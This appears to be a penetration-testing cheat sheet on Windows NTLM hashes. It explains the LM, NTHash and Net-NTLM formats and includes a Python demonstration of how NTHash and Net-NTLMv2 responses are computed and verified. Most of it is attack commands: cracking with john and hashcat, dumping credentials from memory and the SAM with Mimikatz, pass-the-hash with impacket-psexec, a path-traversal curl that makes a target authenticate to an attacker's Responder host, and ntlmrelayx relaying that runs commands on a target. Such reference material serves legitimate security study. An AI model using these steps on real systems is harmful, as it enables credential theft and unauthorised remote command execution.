NTLM Hashes

Introduction

Windows stores hashed user passwords in the Security Account Manager (SAM) database file on local machines, or in the NTDS.DIT database located on Domain Controllers. An important thing to note is that the stored hashes are not salted.

There are multiple hash formats that have been used to store passwords in Windows.

LM

The LM hash is the oldest way of storing passwords in Windows, but it is considered weak and insufficient. It has been disabled by default since Windows Vista / Windows Server 2008.

Cracking LM hash:

john --format=lm hash.txt
hashcat -m 3000 -a 3 hash.txt

NTHash

On modern systems, passwords are stored as NTHash (a.k.a. NTLM) hashes.

Cracking NTHash:

john --format=nt hash.txt
hashcat -m 1000 -a 3 hash.txt

NTLMv1

The NTLMv1 (a.k.a. Net-NTLMv1) protocol uses the NTHash in a challenge/response exchange between a server and a client.

Cracking NTLMv1 hash:

john --format=netntlm hash.txt
hashcat -m 5500 -a 3 hash.txt

NTLMv2

NTLMv2 (a.k.a. Net-NTLMv2) is the newer and improved version of the NTLMv1 protocol, which makes captured responses somewhat harder to crack.

Cracking NTLMv2 hash:

john --format=netntlmv2 hash.txt
hashcat -m 5600 -a 3 hash.txt
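As an added example (not part of the original notes), the following Python shows how the NTHash and the Net-NTLMv2 response described above are derived, together with the server-side check a DC performs on such a response. The MD4 is a pure-Python implementation of RFC 1320, because hashlib on OpenSSL 3 builds often no longer exposes md4; the account names, domain, passwords, challenges and target info are constructed sample values. It demonstrates three things the notes state in prose: the same password yields an identical NTHash on every account because there is no salt; a captured Net-NTLMv2 response is bound to its server challenge, so it cannot be precomputed, yet it can still be checked offline against a password guess; and the NTHash alone is enough to produce valid responses, which is why it is a password equivalent and why pass-the-hash works.

```python
import hashlib
import hmac
import struct

# --- Pure-Python MD4 (RFC 1320). Only needed because many OpenSSL 3 builds
# --- do not expose md4 via hashlib. The NTHash is MD4 over UTF-16LE text.
_MASK = 0xFFFFFFFF


def _rotl(x, n):
    x &= _MASK
    return ((x << n) | (x >> (32 - n))) & _MASK


def md4(data: bytes) -> bytes:
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = bytearray(data) + b"\x80"                  # padding: 0x80, zeros, 64-bit LE bit length
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    r2 = (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)
    r3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):                          # round 1
            a = _rotl(a + f(b, c, d) + x[i], (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                          # round 2
            a = _rotl(a + g(b, c, d) + x[r2[i]] + 0x5A827999, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                          # round 3
            a = _rotl(a + h(b, c, d) + x[r3[i]] + 0x6ED9EBA1, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & _MASK, (b + bb) & _MASK, (c + cc) & _MASK, (d + dd) & _MASK
    return struct.pack("<4I", a, b, c, d)


def nthash(password: str) -> bytes:
    """NTHash = MD4(UTF-16LE(password)). No salt, no iteration: same password -> same hash."""
    return md4(password.encode("utf-16-le"))


# --- Net-NTLMv2 (MS-NLMP 3.3.2): the stored NTHash is the key for every response.
def ntowf_v2(nt_hash: bytes, user: str, domain: str) -> bytes:
    """NTOWFv2 = HMAC-MD5(NTHash, UTF-16LE(UPPER(user) + domain))."""
    return hmac.new(nt_hash, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def ntlmv2_blob(timestamp: int, client_challenge: bytes, target_info: bytes) -> bytes:
    """The 'temp' structure: RespType, HiRespType, 6 reserved, FILETIME, client nonce, 4 reserved, AV_PAIRs, 4 reserved."""
    return (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp)
            + client_challenge + b"\x00" * 4 + target_info + b"\x00" * 4)


def ntlmv2_response(nt_hash: bytes, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """Client side: NtChallengeResponse = NTProofStr || blob, NTProofStr = HMAC-MD5(NTOWFv2, ServerChallenge || blob)."""
    proof = hmac.new(ntowf_v2(nt_hash, user, domain), server_challenge + blob, hashlib.md5).digest()
    return proof + blob


def verify_ntlmv2(nt_hash: bytes, user: str, domain: str, server_challenge: bytes, response: bytes) -> bool:
    """Server/DC side: recompute NTProofStr from the stored NTHash and compare in constant time."""
    proof, blob = response[:16], response[16:]
    expected = hmac.new(ntowf_v2(nt_hash, user, domain), server_challenge + blob, hashlib.md5).digest()
    return hmac.compare_digest(proof, expected)


def demo() -> dict:
    # Constructed sample values; not taken from any real capture.
    alice, bob = nthash("Summer2024!"), nthash("Summer2024!")
    server_challenge = bytes.fromhex("0123456789abcdef")
    blob = ntlmv2_blob(0, bytes.fromhex("aaaaaaaaaaaaaaaa"), b"\x00" * 4)  # empty AV_PAIR list (MsvAvEOL)
    resp = ntlmv2_response(alice, "alice", "CORP", server_challenge, blob)
    return {
        "unsalted": alice == bob,                                                   # identical hashes reveal shared passwords
        "verified": verify_ntlmv2(alice, "alice", "CORP", server_challenge, resp),  # NTHash alone validates the response
        "wrong_challenge": verify_ntlmv2(alice, "alice", "CORP", bytes(8), resp),   # bound to the challenge it was issued for
        "wrong_password": verify_ntlmv2(nthash("Winter2024!"), "alice", "CORP", server_challenge, resp),
    }


if __name__ == "__main__":
    print("NTHash('password') =", nthash("password").hex())
    print(demo())
```

The `unsalted` result is what makes identical-hash audits on a SAM or NTDS.DIT dump possible (every account sharing a password shows the same 16 bytes), and the `verified` result is the core of both Net-NTLMv2 cracking and pass-the-hash: anyone holding the NTHash can answer any challenge, so the hash must be protected like the password itself.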

Mimikatz

Mimikatz is a well-known tool for extracting passwords and hashes in Windows environments.

NOTE: We can only extract the SAM database if we are running Mimikatz as Administrator (or higher) and have the SeDebugPrivilege.

We can also elevate our privileges to the SYSTEM account with tools like PsExec, or with the built-in Mimikatz token elevation, to obtain the required privileges.

First steps

Running Mimikatz and enabling the debug privilege (SeDebugPrivilege):

.\mimikatz.exe
privilege::debug

Elevating to the required privileges:

token::elevate

Commands

Extract plaintext passwords and password hashes from all available sources:

sekurlsa::logonpasswords

Extract the hashes from the SAM:

lsadump::sam

Pass the Hash

NOTE: In order to perform pass-the-hash, a local Administrator account is required unless the target machine is misconfigured.

Passing the hash using psexec from Impacket:

impacket-psexec -hashes :<NTHash> <username>@<target>

Capture Net-NTLMv2

Responder

Responder is a tool that starts a server running various services. The Responder server handles the authentication process and prints all captured credentials and hashes. It supports HTTP, FTP and SMB, as well as poisoning capabilities for LLMNR, NBT-NS and mDNS.

Basic scenario for capturing Net-NTLMv2 using a vulnerable web application:

Running Responder:

sudo responder -I <interface>

Assuming the web application is vulnerable to path traversal and uses SMB shares to display pages:

curl --path-as-is 'http://<target>/\\<attacker_responder_ip>/a'

The vulnerable web server will then authenticate to the Responder server and the Net-NTLMv2 hash will be captured.

Relaying Net-NTLMv2

NOTE: As with pass-the-hash, a local Administrator account is required unless the target machine has UAC remote restrictions disabled. Also, SMB signing needs to be disabled on the target.

In a scenario where the Net-NTLM hash is too hard to crack, it is possible to relay the Net-NTLM authentication to the target server instead.

This attack is performed with the ntlmrelayx tool from the Impacket scripts. Starting the ntlmrelayx server, which will capture the Net-NTLM authentication and relay it to the target machine:

impacket-ntlmrelayx --no-http-server -smb2support -t <target> -c "<command>"
